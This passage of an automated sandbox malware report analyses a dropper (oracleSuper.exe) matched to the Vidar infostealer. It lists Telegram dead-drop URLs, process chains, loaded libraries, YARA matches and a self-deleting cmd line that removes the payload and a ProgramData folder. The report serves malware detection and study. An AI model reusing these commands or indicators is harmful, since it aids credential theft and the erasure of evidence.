Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.000000000359F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, fru.4.dr String found in binary or memory: https://t.me/puffclou
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/puffclou4
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/puffclou=
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/puffclouW
Source: cmd.exe, 00000004.00000002.2407356619.0000000005510000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540293467.0000000000445000.00000002.00000001.01000000.00000000.sdmp, fru.4.dr String found in binary or memory: https://t.me/puffclouhellosqlt.dllsqlite3.dll
Source: explorer.exe, 00000009.00000002.2541375791.000000000359F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://telegram.org/img/t_logo_2x.png
Source: oracleSuper.exe, 00000000.00000002.2192910487.000000000417D000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, livecall.exe, 00000002.00000002.2170312412.0000000000401000.00000020.00000001.01000000.00000007.sdmp, livecall.exe, 00000002.00000000.2165542384.0000000000401000.00000020.00000001.01000000.00000007.sdmp, livecall.exe, 00000003.00000002.2194751559.0000000000401000.00000020.00000001.01000000.00000009.sdmp, livecall.exe, 00000003.00000000.2169625734.0000000000401000.00000020.00000001.01000000.00000009.sdmp, livecall.exe.0.dr, livecall.exe.2.dr String found in binary or memory: https://voicelogging.pcs.v2s.msn.com/voicelogging.ashx
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.000000000359F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org8
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.orgX
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: oracleSuper.exe String found in binary or memory: https://www.globalsign.com/repository/0
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49866 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49916 version: TLS 1.2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00433160 memset,CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 9_2_00433160
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A0D00 CryptGetProvParam,CryptGenKey,CryptGetKeyParam,CryptGetKeyParam,CryptDestroyKey,CryptGetKeyParam,CryptGetKeyParam,LocalAlloc,CryptGenRandom,CryptImportKey, 3_2_275A0D00
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A14C0 _memset,GetVersionExW,GetLastError,GetLastError,GetLastError,GetLastError,CryptImportKey, 3_2_275A14C0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A1220 CryptGenKey,CryptExportKey,CryptExportKey,CryptExportKey,CryptImportKey,SetLastError,CryptDestroyKey, 3_2_275A1220

System Summary

barindex
Source: 9.2.explorer.exe.420000.0.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 4.2.cmd.exe.55100c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 4.2.cmd.exe.55100c8.7.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\fru, type: DROPPED Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2758FE3C 3_2_2758FE3C
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2758CE2E 3_2_2758CE2E
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2758AEEC 3_2_2758AEEC
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275885B9 3_2_275885B9
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_27584446 3_2_27584446
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2759A4F0 3_2_2759A4F0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275908C0 3_2_275908C0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2758E8C7 3_2_2758E8C7
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0043EA42 9_2_0043EA42
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0043EE15 9_2_0043EE15
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0043EFEA 9_2_0043EFEA
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0043F7F8 9_2_0043F7F8
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe 63EC17FEDA1F0EA80E0DD7B7938FBF7354AEDF8D9F4041543AFCA9A35337F7BF
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: String function: 27595FD0 appears 362 times
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 00424239 appears 287 times
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: String function: 00415C6F appears 39 times
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: String function: 004101E9 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: String function: 00411030 appears 128 times
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: String function: 00424094 appears 206 times
Source: oracleSuper.exe Static PE information: invalid certificate
Source: oracleSuper.exe, 00000000.00000002.2191941536.00000000038AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs oracleSuper.exe
Source: oracleSuper.exe, 00000000.00000002.2192439487.0000000003C0D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs oracleSuper.exe
Source: oracleSuper.exe, 00000000.00000002.2192910487.000000000417D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelivecall.exeD vs oracleSuper.exe
Source: oracleSuper.exe, 00000000.00000002.2192910487.000000000417D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsidcrl.dllP vs oracleSuper.exe
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamezip.exe( vs oracleSuper.exe
Source: oracleSuper.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 9.2.explorer.exe.420000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 4.2.cmd.exe.55100c8.7.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 4.2.cmd.exe.55100c8.7.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: C:\Users\user\AppData\Local\Temp\fru, type: DROPPED Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@15/12@3/3
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0043246A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 9_2_0043246A
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_0041D26A __EH_prolog3,CoCreateInstance,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString, 2_2_0041D26A
Source: C:\Users\user\Desktop\oracleSuper.exe Code function: 0_2_002DDE39 FindResourceW,LoadResource,LockResource, 0_2_002DDE39
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe File created: C:\Users\user\AppData\Roaming\localTask_v2 Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2012:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3564:120:WilError_03
Source: C:\Users\user\Desktop\oracleSuper.exe File created: C:\Users\user\AppData\Local\Temp\6942704c Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Command line argument: UnregServer 2_2_004104C2
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Command line argument: RegServer 2_2_004104C2
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Command line argument: Embedding 2_2_004104C2
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Command line argument: pcsexeps.dll 2_2_004104C2
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Command line argument: softphone.dll 2_2_004104C2
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Command line argument: pcsexeps.dll 2_2_004104C2
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Command line argument: softphone.dll 2_2_004104C2
Source: oracleSuper.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\explorer.exe File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\oracleSuper.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: oracleSuper.exe Virustotal: Detection: 8%
Source: livecall.exe String found in binary or memory: y" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/03/addressing" xmlns:wssc="http://schemas.xmlsoap.org/ws/2004/04/sc" xmlns:wst="http://schemas.xmlsoap.org/ws/2004/0
Source: oracleSuper.exe String found in binary or memory: Do you still want to launch the application ?FileVersionINSTLOCALINSTALLFICUPDATE134 - Echec de l'init de WinSock%s : %s//%s/INSTALL/%s 407200EXE%s\%s.exe%s\%s_%d.exe/%s/INSTALL/INSTALL.EXE138 - Echec de la requete HTTP - LastError = %s /REP="%s" /NOEXEC /WAIT139 - Lancement de la mise
Source: C:\Users\user\Desktop\oracleSuper.exe File read: C:\Users\user\Desktop\oracleSuper.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\oracleSuper.exe "C:\Users\user\Desktop\oracleSuper.exe"
Source: C:\Users\user\Desktop\oracleSuper.exe Process created: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Process created: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\SysWOW64\explorer.exe" & rd /s /q "C:\ProgramData\EBFHJEGDAFHI" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\oracleSuper.exe Process created: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Process created: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\SysWOW64\explorer.exe" & rd /s /q "C:\ProgramData\EBFHJEGDAFHI" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10 Jump to behavior
Source: C:\Users\user\Desktop\oracleSuper.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\oracleSuper.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\oracleSuper.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\oracleSuper.exe Section loaded: pla.dll Jump to behavior
Source: C:\Users\user\Desktop\oracleSuper.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Users\user\Desktop\oracleSuper.exe Section loaded: tdh.dll Jump to behavior
Source: C:\Users\user\Desktop\oracleSuper.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Users\user\Desktop\oracleSuper.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Users\user\Desktop\oracleSuper.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Users\user\Desktop\oracleSuper.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: msidcrl40.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: sensapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: pla.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: tdh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: msidcrl40.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: sensapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: pla.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: tdh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: oracleSuper.exe Static file information: File size 6613368 > 1048576
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll Jump to behavior
Source: oracleSuper.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x600400
Source: oracleSuper.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: oracleSuper.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: oracleSuper.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: oracleSuper.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: oracleSuper.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: oracleSuper.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: oracleSuper.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: oracleSuper.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wntdll.pdbUGP source: oracleSuper.exe, 00000000.00000002.2192439487.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp, oracleSuper.exe, 00000000.00000002.2192732992.0000000003E92000.00000004.00000001.00020000.00000000.sdmp, oracleSuper.exe, 00000000.00000002.2191941536.0000000003787000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171386304.000000000287E000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171686522.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2196426125.0000000002F65000.00000004.00000001.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195892526.000000000285E000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2196118649.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407126483.0000000005060000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2406823080.0000000004C17000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541837942.000000000B900000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541001928.0000000000BFA000.00000004.00000020.00020000.00000000.sdmp
